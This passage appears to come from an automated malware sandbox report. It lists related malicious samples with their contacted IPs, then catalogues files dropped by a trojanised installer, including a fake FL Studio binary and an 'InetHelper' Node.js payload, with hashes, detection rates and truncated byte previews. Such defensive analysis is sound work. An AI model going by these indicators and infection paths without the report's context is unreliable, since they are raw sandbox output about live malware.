                                                                                                                                                                                                          • 23.221.242.90
                                                                                                                                                                                                          • 13.85.23.86
                                                                                                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 23.221.242.90
                                                                                                                                                                                                          • 13.85.23.86
                                                                                                                                                                                                          Specification 1223.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                          • 23.221.242.90
                                                                                                                                                                                                          • 13.85.23.86
                                                                                                                                                                                                          DHL Express shipment delivery doc pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • 23.221.242.90
                                                                                                                                                                                                          • 13.85.23.86
                                                                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1WlCIinu0yp.exeGet hashmaliciousLummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Socks5Systemz, Vidar, zgRATBrowse
                                                                                                                                                                                                          • 172.67.152.151
                                                                                                                                                                                                          Invoice-939713625-008-5283127-8901604.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 172.67.152.151
                                                                                                                                                                                                          Inquiry HA-22-28199 22-077.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 172.67.152.151
                                                                                                                                                                                                          QR#Uff7a#Uff70#Uff84#Uff9e#U4f5c#U6210#Uff74#Uff78#Uff7e#Uff99.xlsb.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 172.67.152.151
                                                                                                                                                                                                          SecuriteInfo.com.FileRepMalware.10290.11280.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 172.67.152.151
                                                                                                                                                                                                          SecuriteInfo.com.FileRepMalware.10290.11280.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 172.67.152.151
                                                                                                                                                                                                          VPPAllow.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 172.67.152.151
                                                                                                                                                                                                          VPPAllow.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 172.67.152.151
                                                                                                                                                                                                          file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                                                                                                                                                          • 172.67.152.151
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 172.67.152.151

                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exez5i6tLOUD0.exeGet hashmaliciousRaccoon Stealer v2Browse

                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                            C:\Program Files\Image-Line\FL Studio 20\FL64.exe

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe
                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):294584
                                                                                                                                                                                                            Entropy (8bit):6.743710084630691
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:gcwjo+g91cs3mfzsIohx4rrZtj7QfGZ7uOs:gcao3R2fzdou3jjZ7uOs
                                                                                                                                                                                                            MD5:8D4AEE53F9D6EA4A47DC73EDD78DCEF0
                                                                                                                                                                                                            SHA1:4D12D67EDD64877831DEA463CE67C42EBCA6E0AE
                                                                                                                                                                                                            SHA-256:6CFC98D1FFCDB983E64BEAC75CCDE7D873E3C41FFFDE2F4D87DD0757EB5A620D
                                                                                                                                                                                                            SHA-512:54EAA03F18BCCADDB04A8DD7127F1E9CE8EEFAF1141E3B8684E7F6BBDCC45AA60AA276467F1DF9BD361D0AC8C8DE398959BE18BF2E387DCE34550716E44599EC
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................Z...................................y..K.....K.'......O....K.....Rich...........................PE..d....I~b..........".................4Q.........@....................................$.....@.....................................................x...............4....^... ......\....u...............................u..8...............X............................text............................... ..`.rdata..H...........................@..@.data....%..........................@....pdata..4...........................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..\............V..............@..B........................................................................................................................................................................................

                                                                                                                                                                                                            C:\Program Files\Image-Line\FL Studio 20\FLEngine_x64.dll

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):50859192
                                                                                                                                                                                                            Entropy (8bit):7.541115142114078
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:786432:bol/RBJt80hHNghhydfhuVt/m1f1GFxVDOpoFZb3daUIOGB3:y/RBJ2QNgvybuj/m6NFZb1G
                                                                                                                                                                                                            MD5:E577EF3CFADBB80C6AF8F37BF6E62F70
                                                                                                                                                                                                            SHA1:C27F57E17539F09CEC7B47C223DFA8EA54B851FE
                                                                                                                                                                                                            SHA-256:60392A436109F0B236C2B26CCAF677F3E0E0BD338AEC35A6495C0A25F73E3F15
                                                                                                                                                                                                            SHA-512:A1FA8BB2E148E76E2CCEDFED94D8C93841E086821FE258ADB931F12A1685BF2F5B5A9A131AECE81B18441FDB48112C5F5C914E49A8C689138333FF0C427BCA49
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 6%, Browse
                                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........PE..d....H~b.........." ....."....A.....].........@..............................0......o................................ ...............`...............0...........@....... ...0.......................................................P...... ...@....................text....!.......".................. ..`.data........@.......&..............@....bss....p................................idata...e.......f..................@....didata.z....@.......>..............@....edata.......`.......P..............@..@.rdata..E....p.......R..............@..@.xda0................T..............@..@.pdata...............R..............@..@.xda1...b............J.............. ..`.xda2........P......................@....xda3.......p.......4..............`..h.reloc.......0......................@..@.rsrc........0......................@..@....@..@........................................

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wnsA071.tmp
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4096
                                                                                                                                                                                                            Entropy (8bit):4.102419828599722
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:6EuTWvVUSOmj4g7pDU2MeUkCevHr8IDPrOq81vj/bEGf2dz:r93OSnMe33r3kcNdz
                                                                                                                                                                                                            MD5:E9DED10DFF258F6522FE9079ED3319CA
                                                                                                                                                                                                            SHA1:B0127EA7675F6359BFA80A7BF6282BD1C989B405
                                                                                                                                                                                                            SHA-256:EA1D61984EDE5908E0840E91A71BB127EFD62D836C1F76702B426FD79B57F780
                                                                                                                                                                                                            SHA-512:D95482D3CF50B37E999E3F91377BD41A215F3F0C55C9F3E47FC9C563B9CD3F5C5EE945878889A8147B9F089005826CE81398172395D0107DC14EB8FEFC0D36DE
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 73%, Browse
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z.}c............................}........ ....@..........................@............@.................................t"..P............................0..p.................................................... ..p............................text...J........................... ..`.rdata....... ......................@..@.reloc..p....0......................@..B................QSUVW.|$.3...~..t$...v..6..L @...Y...u.C.j.P..\ @...YY..~7.D$.....D$..0..L @....D$...6Q.0..kQ..h @..D$ .......u._^]..[Y.......$....SUVWh....P3.S..0 @.SS.D$xP..$....P..$....P..d @......$ @.hp @.P..X @.Y...D$tY......h| @.P..$....Pj..........D$.Sj...@ @..,.....W..$....SP..P @......$......$....PV.. @.... @..........-` @...$....h| @.P..YY..uS..$....Ph......< @....D$......D$.P..$....Pj.W... @..t$...$....P..YY..u.j.W.., @.W...$....PV..D @...u.V...v...h. @.P..$....Ph. @.j...........

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wnsA071.tmp
                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6887560
                                                                                                                                                                                                            Entropy (8bit):7.995378654994156
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:196608:QLqzi3tI29TS60FIEPgaJzR1VOoaOVxRtx:QLqzi3XT0uEp/ooaWzx
                                                                                                                                                                                                            MD5:5F40521D2E1082FE1C734610C4A83911
                                                                                                                                                                                                            SHA1:86D54874CC8976CDB75A9DC8DCD817AF50837796
                                                                                                                                                                                                            SHA-256:79AC7AE94231A392D27F303418E305A60C4194DBBE143C5DEFFC977C7B2E7A78
                                                                                                                                                                                                            SHA-512:EF2B54B46844CFB13CFDEF6271E2A8B4E646D2E31CA55229E5C76CA90C649895533BC8FB83C4D50DD3721ABB2A5E4C5EE32DF5C4540E1C14498A5E9B550D3189
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                            • Filename: z5i6tLOUD0.exe, Detection: malicious, Browse
                                                                                                                                                                                                            Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.........$c..J0..J0..J0..I1..J0..O1..J0..N1..J0E~.0..J0..I1..J0..O1Z.J0..N1..J0~.I1..J0..J0..J0~.O1>.J0~.N1..J0..K1..J0..K0..J0~.C1..J0~.J1..J0~..0..J0...0..J0~.H1..J0Rich..J0................PE..L...m.Kb..................f..0....H.0X....H..p....@.......................................@...........................^.....P........p..P+......................,............................d......0d..............................................UPX0......H.............................UPX1......f...H...f.................@....rsrc....0...p...0....f.............@......................................................................................................................................................................................................................................................................................................................3.96.UPX!....

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wnsA071.tmp
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (42843)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):190594
                                                                                                                                                                                                            Entropy (8bit):5.403457343574024
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:fBBZhuuaOKnzpxfuZlrmpSDjmiwo6DQUH0RUISQ2PgdLJ35kCJQuHoz3jn:5BZhuuaBnzpxf5pSDjf6DhHk2PgdN5Lw
                                                                                                                                                                                                            MD5:42FB0FA52C2E0BBBDF379C1ABA97D12E
                                                                                                                                                                                                            SHA1:164C4639D99A7DCFACF29DA930CA4DFEF3621A11
                                                                                                                                                                                                            SHA-256:3DB6FFA48CAE2DBDC68F9BF5EE75BA5B7ABD4F923C5FC6741477916957909071
                                                                                                                                                                                                            SHA-512:B9E96BA85508BB44F49DBF92185157DB149FAB2A6245A2D39CE49DA5AE14617928F44CF8EE2BCB8C9DD4060082CC4B2B84EA6FF7659CE15CAA8D9DA02C46C936
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:"use strict";var Vo=require("events"),Xo=require("https"),Ko=require("http"),Yo=require("net"),Jo=require("tls"),Qo=require("crypto"),ii=require("stream"),Zo=require("url"),ea=require("zlib"),ta=require("dgram"),rs=require("os"),bt=require("path"),oi=require("child_process"),ve=require("fs"),ra=require("assert"),sa=require("buffer"),Kt=require("util"),na=require("dns"),ia=require("http2");function te(t){return t&&typeof t=="object"&&"default"in t?t:{default:t}}var xe=te(Vo),ss=te(Xo),yt=te(Ko),wt=te(Yo),ns=te(Jo),rr=te(Qo),le=te(ii),vt=te(Zo),ai=te(ea),oa=te(ta),St=te(rs),xt=te(bt),ci=te(oi),Ze=te(ve),aa=te(ra),li=te(sa),Tt=te(Kt),ca=te(na),is=te(ia),K=typeof globalThis<"u"?globalThis:typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{};function la(t){return t&&t.__esModule&&Object.prototype.hasOwnProperty.call(t,"default")?t.default:t}function fa(t){throw new Error('Could not dynamically require "'+t+'". Please configure the dynamicRequireTargets or/and ignoreDyna

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\vp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wnsA071.tmp
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:x:x
                                                                                                                                                                                                            MD5:6920626369B1F05844F5E3D6F93B5F6E
                                                                                                                                                                                                            SHA1:EDFB92A5BE2A31A47D117F6C1530E1CEBE1B4963
                                                                                                                                                                                                            SHA-256:5E73D6D7EDD38DAEAE9F10721987E301E4D4B5421E88EB17063AC5A41B168273
                                                                                                                                                                                                            SHA-512:0B307A2ECA21778E3FCA2D855F0E12FF10726FE276BEDBF70B40E10F21DE839922384D494B67D65A21D4FA15D8642A84B6C39B15AB7E91F3B9555A53ECE4F882
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:bt

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Replace.exe
                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):36542497
                                                                                                                                                                                                            Entropy (8bit):7.996676840188324
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:786432:PHYEktqugC1limyl/Qb7TMNdi8q8aPn6Ck0IjxGYuIMD9FwLNb1O:PHtud208uyCtIHMDf80
                                                                                                                                                                                                            MD5:D77C3EF3EFA7E38EF91137466EEE801B
                                                                                                                                                                                                            SHA1:0B6CE4B03F43C2A7290F95BFBBE9107298EFEAEF
                                                                                                                                                                                                            SHA-256:91C2295F354B0616AA6481708248F6CE35DBE9292901464FC6BF3A22522CCB2F
                                                                                                                                                                                                            SHA-512:7C0171509814F7E5F24B2A9D53A10AB282586EC56BCDEDC2DEB2BA1AA2B4D9EDADE6D6D753CA80FB65D147597BFD4AC9F30E330E88C695E72C913FF3AB224750
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 7%, Browse
                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......-..Ti`m.i`m.i`m.....a`m......`m.....d`m.....k`m...i.x`m...n.``m...h.F`m.`...``m.`...h`m.`...l`m.i`l.yam...h.X`m...m.h`m.....h`m...o.h`m.Richi`m.................PE..d....U.a.........."......l...........?.........@..........................................`..........................................j..4....k..<....0...o......()......................T...............................8....................\.. ....................text....k.......l.................. ..`.rdata..Z............p..............@..@.data...tU...........l..............@....pdata..().......*..................@..@.didat..(...........................@..._RDATA....... ......................@..@.rsrc....o...0...p..................@..@.reloc............... ..............@..B................................................................................................................................

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsb75D2.tmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7289386
                                                                                                                                                                                                            Entropy (8bit):7.96739805150338
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:196608:TRLqzi3tI29TS60FIEPgaJzR1VOoaOVxRt:dLqzi3XT0uEp/ooaWz
                                                                                                                                                                                                            MD5:8D57CCBCBCEF08983E7C76186A225DD4
                                                                                                                                                                                                            SHA1:7319C5569CCB115641146DAA1FD199F007FB0900
                                                                                                                                                                                                            SHA-256:D8AB13351F87952882BCDD22E272DFD7FC12B19D4C9D1238992BDB3E667EF2BD
                                                                                                                                                                                                            SHA-512:8E19B7FB99469C882A7811C2E1268D0B4E65DE5F3744E34A5EBCC7986A5E571ED34CF44281D8E08182598CB7DBF7C1DB23A5FE5FE1C922436DC9475FA2A534F9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.X......,................A.......O.......X.......X..........................................................................................................................................................................................................................................G...\...............j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsq5A5B.tmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7289386
                                                                                                                                                                                                            Entropy (8bit):7.96739805150338
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:196608:TRLqzi3tI29TS60FIEPgaJzR1VOoaOVxRt:dLqzi3XT0uEp/ooaWz
                                                                                                                                                                                                            MD5:8D57CCBCBCEF08983E7C76186A225DD4
                                                                                                                                                                                                            SHA1:7319C5569CCB115641146DAA1FD199F007FB0900
                                                                                                                                                                                                            SHA-256:D8AB13351F87952882BCDD22E272DFD7FC12B19D4C9D1238992BDB3E667EF2BD
                                                                                                                                                                                                            SHA-512:8E19B7FB99469C882A7811C2E1268D0B4E65DE5F3744E34A5EBCC7986A5E571ED34CF44281D8E08182598CB7DBF7C1DB23A5FE5FE1C922436DC9475FA2A534F9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.X......,................A.......O.......X.......X..........................................................................................................................................................................................................................................G...\...............j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsr383C.tmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wnsA071.tmp
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7289386
                                                                                                                                                                                                            Entropy (8bit):7.96739805150338
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:196608:TRLqzi3tI29TS60FIEPgaJzR1VOoaOVxRt:dLqzi3XT0uEp/ooaWz
                                                                                                                                                                                                            MD5:8D57CCBCBCEF08983E7C76186A225DD4
                                                                                                                                                                                                            SHA1:7319C5569CCB115641146DAA1FD199F007FB0900
                                                                                                                                                                                                            SHA-256:D8AB13351F87952882BCDD22E272DFD7FC12B19D4C9D1238992BDB3E667EF2BD
                                                                                                                                                                                                            SHA-512:8E19B7FB99469C882A7811C2E1268D0B4E65DE5F3744E34A5EBCC7986A5E571ED34CF44281D8E08182598CB7DBF7C1DB23A5FE5FE1C922436DC9475FA2A534F9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.X......,................A.......O.......X.......X..........................................................................................................................................................................................................................................G...\...............j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\wnsA071.tmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7055674
                                                                                                                                                                                                            Entropy (8bit):7.999719681341328
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:98304:W3njVY6OUdcAFccO//cirLLuaj06dT92azIXajHMtHM8gGIOBYADTeLhl6GC1tLt:W3Hvn5irnuaA6GaPj+VgGIOYSTeLXo
                                                                                                                                                                                                            MD5:7A506A2E92BC66A9F64C2333A815E97A
                                                                                                                                                                                                            SHA1:A123F6C070F4258C481CB0B6C2B5D1403463E2FA
                                                                                                                                                                                                            SHA-256:C9DACA7DE1B623867AEE943A1D508573841F2584FFA91AAAF09DE2A883D2733F
                                                                                                                                                                                                            SHA-512:8BDEC3839CA8E0C72DCB76455AD1585264DCEF4150D90E0299B477F99590A1B98AC0BD377985AC2E8E2C15F071588AD821650FC200E0F65EC4583F3F82582E30
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 77%, Browse
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...y..\.................f.......@...4............@.......................... ............@.............................................P............................................................................................................text....d.......f.................. ..`.rdata...............j..............@..@.data...Xc...........~..............@....ndata...................................rsrc...P...........................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7055674
                                                                                                                                                                                                            Entropy (8bit):7.999719681341328
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:98304:W3njVY6OUdcAFccO//cirLLuaj06dT92azIXajHMtHM8gGIOBYADTeLhl6GC1tLt:W3Hvn5irnuaA6GaPj+VgGIOYSTeLXo
                                                                                                                                                                                                            MD5:7A506A2E92BC66A9F64C2333A815E97A
                                                                                                                                                                                                            SHA1:A123F6C070F4258C481CB0B6C2B5D1403463E2FA
                                                                                                                                                                                                            SHA-256:C9DACA7DE1B623867AEE943A1D508573841F2584FFA91AAAF09DE2A883D2733F
                                                                                                                                                                                                            SHA-512:8BDEC3839CA8E0C72DCB76455AD1585264DCEF4150D90E0299B477F99590A1B98AC0BD377985AC2E8E2C15F071588AD821650FC200E0F65EC4583F3F82582E30
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 77%, Browse
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...y..\.................f.......@...4............@.......................... ............@.............................................P............................................................................................................text....d.......f.................. ..`.rdata...............j..............@..@.data...Xc...........~..............@....ndata...................................rsrc...P...........................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7055674
                                                                                                                                                                                                            Entropy (8bit):7.999719681341328
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:98304:W3njVY6OUdcAFccO//cirLLuaj06dT92azIXajHMtHM8gGIOBYADTeLhl6GC1tLt:W3Hvn5irnuaA6GaPj+VgGIOYSTeLXo
                                                                                                                                                                                                            MD5:7A506A2E92BC66A9F64C2333A815E97A
                                                                                                                                                                                                            SHA1:A123F6C070F4258C481CB0B6C2B5D1403463E2FA
                                                                                                                                                                                                            SHA-256:C9DACA7DE1B623867AEE943A1D508573841F2584FFA91AAAF09DE2A883D2733F
                                                                                                                                                                                                            SHA-512:8BDEC3839CA8E0C72DCB76455AD1585264DCEF4150D90E0299B477F99590A1B98AC0BD377985AC2E8E2C15F071588AD821650FC200E0F65EC4583F3F82582E30
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 77%, Browse
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...y..\.................f.......@...4............@.......................... ............@.............................................P............................................................................................................text....d.......f.................. ..`.rdata...............j..............@..@.data...Xc...........~..............@....ndata...................................rsrc...P...........................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\wsc86FC.tmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Replace.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6656
                                                                                                                                                                                                            Entropy (8bit):4.828894210941588
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:DWYJfktl9o3fraRGA27A0xsuFj9+eKmuJGZY6Gn17/xr:6Efkt7o3fraR5Wvsu7+1JGZ/Gnt
                                                                                                                                                                                                            MD5:41E689A7859429D628C34A82BCBB1187
                                                                                                                                                                                                            SHA1:F435C4225FC00B3CE4543B812731A65D3722BDC3
                                                                                                                                                                                                            SHA-256:252DD587C652E9939432BD8B5574590C4A8DB64660BC753F5490A472703F5C3A
                                                                                                                                                                                                            SHA-512:6A8F76F4D2EEB78DF1C48F43C8D31F4510F2BA8DA71FBB93D88627EBA5F4CC74EB9AA12B7688D7FB62ED938FE2AC15BD2C060D6AD90E5B2C61114F74FCECEC85
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 67%, Browse
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}c...........!......................... ...............................P............@.........................@$..L....$...............................@....................................................... ...............................text...;........................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            Chrome Cache Entry: 62

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1746)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):163891
                                                                                                                                                                                                            Entropy (8bit):5.55061820245277
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:S0eiNiuzs8v4HHKWY8s1BgP4IDQ9GURWu8zylA/u8PemUPhDlaY/ADiZ65LpK629:S0eMhzvwHHKWY8s1BgP4IDQ9GURWu8UD
                                                                                                                                                                                                            MD5:0282D5C4C6038FCEB2FF8607EDAC81A4
                                                                                                                                                                                                            SHA1:62EBF05C33F8A3115C208BB4D5CE9B38F6D06447
                                                                                                                                                                                                            SHA-256:AAAF17E8ED9C8DD5D1B69C8BBB617600A768256654C076F760E09C6047973371
                                                                                                                                                                                                            SHA-512:E21D25042E41527B62E80F9D9B82B85B915BA6D0698B2FFA5D8D59115F764770D1DE2108B72D82D57BFB7A8D4406FB53D091C1DC6D8BD03BED3BCA29CEFD0EAD
                                                                                                                                                                                                            Malicious:false
